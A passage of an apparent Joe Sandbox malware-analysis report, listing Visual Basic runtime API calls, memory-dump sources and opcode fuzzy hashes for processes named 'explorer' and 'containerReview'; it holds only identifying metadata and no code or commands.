                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7CD
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7D8
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7F8
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E801
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E807
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2075080343-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$CloseFile$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2014117853-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,x$@,?,?,?,?,?,00000000,004025E6), ref: 004189B6
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 004189E7
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418A02
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$ExitOverflowProc
                                                                                                                                                            • String ID: XuA$x$@
                                                                                                                                                            • API String ID: 3328922952-1101804690
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E295
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E2BA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071CC,00000094), ref: 0040E2E4
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F3
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4045702744-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9DB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9E9
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9F4
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9FD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0
                                                                                                                                                            • Opcode Fuzzy Hash: cc1e5296d408d6bbd24cc9ce155d15915a100320f7ffd319bc96db478b44b545
                                                                                                                                                            • Instruction Fuzzy Hash: 6C5191B1E0A60E8FDB5ADFA8C4A15BDB7B5FF44300F1141BAD01AE72D6CA356905CB40
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                            • Opcode ID: def619f3cb4ac7847f8b87188d1bdd9833170fc2b2bf9b36dcfc9597ea6bfc51
                                                                                                                                                            • Instruction ID: 176aedeb21a1f5af9772327e95fae2a981e316326ab7b2ad6aa8d7299ceeab2c
                                                                                                                                                            • Opcode Fuzzy Hash: def619f3cb4ac7847f8b87188d1bdd9833170fc2b2bf9b36dcfc9597ea6bfc51
                                                                                                                                                            • Instruction Fuzzy Hash: 93516EB1E0964E8FDB59DB98C4616FCB7B5FF58300F1181BED01AE72A6CA356A01CB41
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 286e732bff865435107071c5ef4fff71e0538026d4fa9b3f70668147422f2aef
                                                                                                                                                            • Instruction ID: 3e7c39546c803bce4f02542b4dcd23e6a75aa6bcc292eba3aaaaeadbc14dc5b6
                                                                                                                                                            • Opcode Fuzzy Hash: 286e732bff865435107071c5ef4fff71e0538026d4fa9b3f70668147422f2aef
                                                                                                                                                            • Instruction Fuzzy Hash: 8132E830B09A1D8FDBA8DB48C8A5AB873E9FF55315B1541B9D00EC72A2DE35ED41CB81
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fff6e7a242738edb15dde25c68e52b616ae4546be8406eb5b3a5e8dd3a0c520e
                                                                                                                                                            • Instruction ID: 45f3ef3bc53dc141e2bc4ff6931ea5ff719b0d3db22e301c661a2440de350393
                                                                                                                                                            • Opcode Fuzzy Hash: fff6e7a242738edb15dde25c68e52b616ae4546be8406eb5b3a5e8dd3a0c520e
                                                                                                                                                            • Instruction Fuzzy Hash: 1CE1B570B0DA0D8FDBA8DA48C8A5AB877E9FF55315F1101B9D00DC72A2DE29AD45CB81
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: edafa2b3e8e5cc2231d28de51483f81f3dbbdd6fa89aafd3810bdaf137fa4d2a
                                                                                                                                                            • Instruction ID: 402cb3bbce34ebe9d4c50f35f174468cf0b7fa09b8e2d6cd5e6dd3acec2179e3
                                                                                                                                                            • Opcode Fuzzy Hash: edafa2b3e8e5cc2231d28de51483f81f3dbbdd6fa89aafd3810bdaf137fa4d2a
                                                                                                                                                            • Instruction Fuzzy Hash: 33F1E570A196598FEB69CF58C4E06B477A9FF44300F5181BDC84ECB29ACB39E981CB41
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7fa43528279b4374a3ccfe536d0fba29993f8000149b543de7822f0bc98836c4
                                                                                                                                                            • Instruction ID: 279a74f04480bc0394a8fc334ab047d2ab4457cf6659d9238be0d0ca69913aa8
                                                                                                                                                            • Opcode Fuzzy Hash: 7fa43528279b4374a3ccfe536d0fba29993f8000149b543de7822f0bc98836c4
                                                                                                                                                            • Instruction Fuzzy Hash: A9F1D570A195598FEB58CF58C4E06B477A9FF45300F5582BDC84ECB69ACA39F982CB40
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b3ddd0e3e3414eb91dacf9ba58fdf4224f8a4e0ae26527a429b52b836a88aca7
                                                                                                                                                            • Instruction ID: 06318410de2fbaff5468d2fd435a578ad062e29d373b6b048e170795d208209b
                                                                                                                                                            • Opcode Fuzzy Hash: b3ddd0e3e3414eb91dacf9ba58fdf4224f8a4e0ae26527a429b52b836a88aca7
                                                                                                                                                            • Instruction Fuzzy Hash: 62D1F270A0EB0A4FE379DB68D0A057577F9FF44300B15457EC48EC76A2DE2ABA428741
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3ba4a2b30ad53859a544774dbb4090a99af58129562f8adc0b98e218ee9b6aa7
                                                                                                                                                            • Instruction ID: 9fd0dc8a89d755d275aa73908f5c0ed40ab8ea5dbe0e79f19248bf0dfa1ab57c
                                                                                                                                                            • Opcode Fuzzy Hash: 3ba4a2b30ad53859a544774dbb4090a99af58129562f8adc0b98e218ee9b6aa7
                                                                                                                                                            • Instruction Fuzzy Hash: 2CD11670A0EB4A8FD378DBA8C4A417577E9FF44300B25057EE08FC76E2DA2AB9418741
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8932bb202950ff869a9b820b2f0122e763e8fcba9c67b66ac52969344324bfdb
                                                                                                                                                            • Instruction ID: 02cc2f7d5322cfebe482c99851b80879e2bcb9f9c289ae24cc5233383d1d2537
                                                                                                                                                            • Opcode Fuzzy Hash: 8932bb202950ff869a9b820b2f0122e763e8fcba9c67b66ac52969344324bfdb
                                                                                                                                                            • Instruction Fuzzy Hash: CED12474B0EB0A4FEB78DB68C4A857577E9FF44300B11457EC08EC76A6DE2AB9428741
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bac603557578ad03f8ba12bcaeed94526052f731c9ea979473845d4ebe39c81d
                                                                                                                                                            • Instruction ID: 9a960e694dd4510432cefffb781286ba08c5f0e264e83d99ba9c342aae4f1514
                                                                                                                                                            • Opcode Fuzzy Hash: bac603557578ad03f8ba12bcaeed94526052f731c9ea979473845d4ebe39c81d
                                                                                                                                                            • Instruction Fuzzy Hash: 54C1057061A54A8BEB2CCF48C4E05B137A9FF45304B9146BDD84B8B69BCB39F942CB45
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9932b7a6297dffe3d0d25fb72d62d4c561d84c4eb58ac33af4e5b043e7832091
                                                                                                                                                            • Instruction ID: 512279ac07dae316df4aa1cf2d8eefc8c7d7303b617ab0cc93b23fabf06815be
                                                                                                                                                            • Opcode Fuzzy Hash: 9932b7a6297dffe3d0d25fb72d62d4c561d84c4eb58ac33af4e5b043e7832091
                                                                                                                                                            • Instruction Fuzzy Hash: 0AC1F770A1954A8FEB1DCF54C4E06B137A9FF45310B5586BDD88B8B69BCA38F942CB40
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: eddb2b0c8a0eff5fcefe24a3a90b2fcc1aa81857a8c3795dc5bb14f38e156a4d
                                                                                                                                                            • Instruction ID: 3e8e9627b55c9f27a2988498302db3b7569efb5aa06484c505e6133f33169fcb
                                                                                                                                                            • Opcode Fuzzy Hash: eddb2b0c8a0eff5fcefe24a3a90b2fcc1aa81857a8c3795dc5bb14f38e156a4d
                                                                                                                                                            • Instruction Fuzzy Hash: E4C1F67061A64A8FEB1ECF58C0E05B477A9FF45304B5585BDC84B8B69BCA39F941CB40
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 31cbcefe1251f2ecdc94a02a8457304c322bc1fbb294e8af21676df14d218013
                                                                                                                                                            • Instruction ID: c92c85c0a2d518b25de5627dd4dd31656a6dd291023e237577826fe8ed398f1f
                                                                                                                                                            • Opcode Fuzzy Hash: 31cbcefe1251f2ecdc94a02a8457304c322bc1fbb294e8af21676df14d218013
                                                                                                                                                            • Instruction Fuzzy Hash: B0C10570B0AA4A8FE759DB58C0A06B4B7E9FF58304F458179D04EC7A96CB39F951CB80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6fd07aa92cafc41e52d620beca9e6ba47a6e6389c90fe79ded063aa6d630cd64
                                                                                                                                                            • Instruction ID: 16b622994fb9674cb3d8165abac4e98801450de046c433845058d8dfa10c74dd
                                                                                                                                                            • Opcode Fuzzy Hash: 6fd07aa92cafc41e52d620beca9e6ba47a6e6389c90fe79ded063aa6d630cd64
                                                                                                                                                            • Instruction Fuzzy Hash: AD213682F0FB9F86F67561E828711FC564C5F54325F1A66BBD44E860F2CC0EAAC152A2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 22e9a7468a306dc69e3f9a9b65f5f3f8e2076c4bc5d773515951f751f5a05aed
                                                                                                                                                            • Instruction ID: f379c4d74eccfcc480d84ee0c2a01e97170e3ad4fee05b927356c230f3ced9f4
                                                                                                                                                            • Opcode Fuzzy Hash: 22e9a7468a306dc69e3f9a9b65f5f3f8e2076c4bc5d773515951f751f5a05aed
                                                                                                                                                            • Instruction Fuzzy Hash: FD214B96F0F58F8BF63556E4083097CA68C6F40B20F1A06BAD44D960F3DD5E2E547382
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 752b202fb8ce7a7005444507617a56024ce42b03c1627f2ab84d0b72904dd80a
                                                                                                                                                            • Instruction ID: 14acee231ae368dcaacf7249b3f4c2dd3ecce2c4240912579b8d2051d7dfa8fb
                                                                                                                                                            • Opcode Fuzzy Hash: 752b202fb8ce7a7005444507617a56024ce42b03c1627f2ab84d0b72904dd80a
                                                                                                                                                            • Instruction Fuzzy Hash: 34212B96F0F68F8BF77556E4083097CA68C5F50B20F1A06BAD48D960F3DC5A2E546382
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8cb0dbc7f8037adecdeafe5c59089174ff32e984b44110141b5099968bc06643
                                                                                                                                                            • Instruction ID: a1bc06cb093e819c2f4fd943a2492db29ae70130dea82f601d06973862f7231d
                                                                                                                                                            • Opcode Fuzzy Hash: 8cb0dbc7f8037adecdeafe5c59089174ff32e984b44110141b5099968bc06643
                                                                                                                                                            • Instruction Fuzzy Hash: EAA10770A0EA4A8FE75ADB68C0A06B4B7E9FF45300F5541BDD04EC7A97CB29B951C780
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 59d38f199b1a522f41629aa74a24b7f4ab2a65e4a789c00f6590948a47d49c6d
                                                                                                                                                            • Instruction ID: 6d9027100358e6a0f2b766b2a14e3d069ccd327eddf3aac686b28e0e9419ad8a
                                                                                                                                                            • Opcode Fuzzy Hash: 59d38f199b1a522f41629aa74a24b7f4ab2a65e4a789c00f6590948a47d49c6d
                                                                                                                                                            • Instruction Fuzzy Hash: C4117C9AF0F59B8AF679119828310BC76CD6F55750F1A01BADD5E860E69E2E2A403282
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7bbcd68d467d820c53a1ee4a514bacc359c4b33f682452daa92d351bc74f4814
                                                                                                                                                            • Instruction ID: 4c0a2ac28087e8164de5576111f46a781747fd992b87e9de49c75a9c75e6a896
                                                                                                                                                            • Opcode Fuzzy Hash: 7bbcd68d467d820c53a1ee4a514bacc359c4b33f682452daa92d351bc74f4814
                                                                                                                                                            • Instruction Fuzzy Hash: 80815B71B0EA4A4FE379DA68946157977ECEF45310F16017FD08EC31A3DE2ABA028785
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f986e9e3be00be7d2eda4b657f3b8c0c267fcfdd43bfbf457bb625ab022d28a3
                                                                                                                                                            • Instruction ID: 145d299cc56341d10952c3bc78c88936719607af48dcbedbfeb0c2a119042918
                                                                                                                                                            • Opcode Fuzzy Hash: f986e9e3be00be7d2eda4b657f3b8c0c267fcfdd43bfbf457bb625ab022d28a3
                                                                                                                                                            • Instruction Fuzzy Hash: 23815971B0EB4A4FE739DA689861575B7ECFF45310B16057FD08EC32A2DE2AB5028742
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5bac1bfd2d9556b6f0923ce4d2924e02505ba7b812a57003cf7761eddc792d57
                                                                                                                                                            • Instruction ID: d08fbe665052244c6b61c4892852aee169a301712ef42c360a62c78d256d6187
                                                                                                                                                            • Opcode Fuzzy Hash: 5bac1bfd2d9556b6f0923ce4d2924e02505ba7b812a57003cf7761eddc792d57
                                                                                                                                                            • Instruction Fuzzy Hash: 35816B71B0E70E4FE3399AE895A547977E8EF41310B16017EE48FD31A3DD2AB9028741
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7dd8d637fe98b9a68812b04704a693d40cb1a6d8421d4bed65eb99a5b19700b4
                                                                                                                                                            • Instruction ID: ee744dc7dadc82d6529849f7c96ae9567c2d6b3af1f3645583342a6e4ebc10e6
                                                                                                                                                            • Opcode Fuzzy Hash: 7dd8d637fe98b9a68812b04704a693d40cb1a6d8421d4bed65eb99a5b19700b4
                                                                                                                                                            • Instruction Fuzzy Hash: 0F7159B1B0E54D4FE778DA5888665B537CCFF48710B1202B9D09EC75B3DE1AAE068781
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000D.00000002.1932241805.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffd9bea0000_containerReview.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
